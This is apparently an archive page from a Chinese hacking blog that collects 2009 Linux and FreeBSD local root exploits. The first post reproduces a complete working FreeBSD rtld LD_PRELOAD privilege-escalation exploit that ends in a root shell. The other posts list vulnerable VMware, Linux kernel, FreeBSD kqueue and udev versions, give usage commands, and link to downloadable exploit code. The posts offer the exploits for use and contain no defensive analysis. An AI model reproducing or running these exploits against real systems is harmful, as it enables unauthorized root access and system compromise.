存档

‘Linux Exploit’ 分类的存档

FreeBSD Run-Time Link-Editor Local r00t Zeroday

2009年12月1日 1 条评论

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 “BiG TiME”

“Go fetch your FreeBSD r00tkitz” // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like “ping” or “su”.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

#!/EXPLOIT

bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
       extern char **environ;
       environ = (char**)malloc(8096);

       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

       execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
       extern char **environ;
       environ=NULL;
       system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
分类: Linux Exploit, 漏洞收集 标签:

VMWare Virtual 8086 Linux Local Ring0 Exploit

2009年11月25日 1 条评论

###############################
# EDB-ID: 10207
# CVE-ID: (CVE-2009-2267)
# Title: VMWare Virtual 8086 Linux Local Ring0 Exploit
# Author: Tavis Ormandy and Julien Tinnes
# Published: 2009-10-27
# Download Exploit Code
# Download N/A
###############################
Published: Oct 27 2009 12:00AM
Updated: Oct 27 2009 09:18PM
Credit: Tavis Ormandy and Julien Tinnes of the Google Security Team
Vulnerable: VMWare Workstation 6.5.3
VMWare Workstation 6.5.2 build 156735
VMWare Workstation 6.5.2
VMWare Workstation 6.5.1
VMWare Workstation 6.5 build 118166
VMWare Server 2.0.1 build 156745
VMWare Server 2.0.1
VMWare Server 1.0.9 build 156507
VMWare Server 1.0.9
VMWare Server 1.0.8 build 126538
VMWare Server 1.0.8
VMWare Server 1.0.7 build 108231
VMWare Server 1.0.7
VMWare Server 1.0.6 build 91891
VMWare Server 1.0.6
VMWare Server 1.0.5 Build 80187
VMWare Server 1.0.5
VMWare Server 1.0.4
VMWare Server 1.0.3
VMWare Server 1.0.2
VMWare Server 2.0
VMWare Player 2.5.3
VMWare Player 2.5.2 build 156735
VMWare Player 2.5.2
VMWare Player 2.5.1
VMWare Player 2.5 build 118166
VMWare Fusion 2.0.6
VMWare Fusion 2.0.5
VMWare Fusion 2.0.4
VMWare Fusion 2.0.3
VMWare Fusion 2.0.2 build 147997
VMWare Fusion 2
VMWare ESXi Server 4.0
VMWare ESXi Server 3.5 ESXe350-20090440
VMWare ESXi Server 3.5
VMWare ESX Server 3.0.3 ESX303-200905401-SG
VMWare ESX Server 3.0.3 ESX303-200812406-BG
VMWare ESX Server 3.0.3
VMWare ESX Server 3.0.3
VMWare ESX Server 3.0.2 ESX-1008420
VMWare ESX Server 3.0.2
VMWare ESX Server 3.0.1
VMWare ESX Server 3.0
VMWare ESX Server 2.5.5 patch 9
VMWare ESX Server 2.5.5 patch 8
VMWare ESX Server 2.5.5 patch 6
VMWare ESX Server 2.5.5 patch 4
VMWare ESX Server 2.5.5 patch 2
VMWare ESX Server 2.5.5 patch 13
VMWare ESX Server 2.5.5 patch 12
VMWare ESX Server 2.5.5 patch 11
VMWare ESX Server 2.5.5 patch 10
VMWare ESX Server 2.5.5
VMWare ESX Server 2.5.4 patch 21
VMWare ESX Server 2.5.4 patch 19
VMWare ESX Server 2.5.4 Patch 17
VMWare ESX Server 2.5.4 Patch 16
VMWare ESX Server 2.5.4 patch 15
VMWare ESX Server 2.5.4 patch 13
VMWare ESX Server 2.5.4 Patch 1
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.3 Patch 4
VMWare ESX Server 2.5.3
VMWare ESX Server 2.5.3
VMWare ESX Server 2.5.3
VMWare ESX Server 2.5.3
VMWare ESX Server 2.5.3
VMWare ESX Server 2.5.3
VMWare ESX Server 2.5.2
VMWare ESX Server 2.5
VMWare ESX Server 2.1.3 Patch 2
VMWare ESX Server 2.1.3
VMWare ESX Server 2.1.3
VMWare ESX Server 2.1.3
VMWare ESX Server 2.1.3
VMWare ESX Server 2.1.2
VMWare ESX Server 2.1.1
VMWare ESX Server 2.1
VMWare ESX Server 2.0.2 Patch 2
VMWare ESX Server 2.0.2
VMWare ESX Server 2.0.2
VMWare ESX Server 2.0.2
VMWare ESX Server 2.0.2
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 2.0
VMWare ESX Server 4.0
VMWare ESX Server 4.0
VMWare ESX Server 3.5 ESX350-200906407
VMWare ESX Server 3.5 ESX350-200904401
VMWare ESX Server 3.5
VMWare ESX Server 2.5.5 patch 5
VMWare ESX Server 2.5.3 Patch 2
VMWare ESX Server 2.5.2 Patch 4
VMWare ESX Server 2.1.3 Patch 1
VMWare ESX Server 2.0.2 Patch 1
VMWare ACE 2.5.2 build 156735
VMWare ACE 2.5.2
VMWare ACE 2.5.1
VMWare ACE 2.5 build 118166
Not Vulnerable: VMWare Workstation 6.5.3 build 185404
VMWare Server 2.0.2 Build 203138
VMWare Server 1.0.10 Build 203137
VMWare Player 2.5.3 build 185404
VMWare Fusion 2.0.6 Build 196839
VMWare ESXi Server 4.0 ESXi400-20090940
VMWare ESXi Server 3.5 ESXe350-20091040
VMWare ESX Server 3.0.3 ESX303-200910401-BG
VMWare ESX Server 2.5.5 patch 15
VMWare ESX Server 4.0 ESX400-200909401
VMWare ESX Server 3.5 ESX350-200910401
VMWare ACE 2.5.3 Build 185404

Down:http://www.007hack.com/tool/linux/vmware86.tar.gz

分类: Linux Exploit 标签:

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit

2009年11月24日 没有评论

This third version features: Complete support for i386, x86_64, ppc and ppc64; The
personality trick published by Tavis Ormandy and Julien Tinnes; The TOC
pointer workaround for data items addressing on ppc64 (i.e. functions
on exploit code and libc can be referenced); Improved search and
transition to SELinux types with mmap_zero permission.

Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.

 测试效果:

root1

 

Down:http://www.007hack.com/tool/linux/2009-linux-sendpage3.tar.gz

分类: Linux Exploit 标签:

FreeBSD <=6.1 kqueue() NULL pointer Dereference Local Root Exploit

2009年9月27日 没有评论

测试成功系统:

Freebsd 6.1

Use:

freebsd

 

 

Down: http://www.007hack.com/tool/linux/freebsd-6.1.c

分类: Linux Exploit 标签:

Linux Local Privilege Escalation Exploit

2009年9月27日 2 条评论

测试成功的系统:

RedHa tEnterprise Linux 4/5
Centos4/5
ubuntu9.04

Use:

./wunderbar_emporium-3

 

Down: http://www.007hack.com/tool/linux/wunderbar_emporium-3.gz

分类: Linux Exploit 标签:

udev Local Privilege Escalation Exploit

2009年9月27日 没有评论

确认受影响版本:

 RHEL 5.X 
 Debian 4.x 5.x 
 Fedora 10
Centos 5.2
Fedora 7 /8

 

Use:

ps -aux|grep udev

sh udev.sh Pid-1

Down: http://www.007hack.com/tool/linux/udev.sh

分类: Linux Exploit 标签: